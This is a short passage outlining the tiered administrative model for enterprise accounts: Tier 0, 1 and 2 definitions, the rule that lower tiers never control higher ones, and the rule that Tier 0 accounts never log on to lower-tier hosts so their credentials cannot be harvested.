• Composed of three levels, applied only to administrative accounts:

o Tier 0 - Accounts, groups and computers which have privileges across the enterprise, such as domain controllers, Domain Admins and Enterprise Admins.

o Tier 1 - Accounts, groups and computers which have access to resources of significant business value. A common example role is server administrators, who maintain these operating systems and can impact all enterprise services.

o Tier 2 - Administrator accounts which have administrative control of a significant amount of business value hosted on workstations and devices. Examples include Help Desk and computer support administrators, because they can impact the integrity of almost any user's data.

• Control Restrictions - what admins control: a lower tier must never be able to administer objects of a higher tier.

• Logon Restrictions - where admins can log on: a Tier 0 account must never log on to a Tier 1 or Tier 2 host, because any host it logs on to can harvest its credentials.
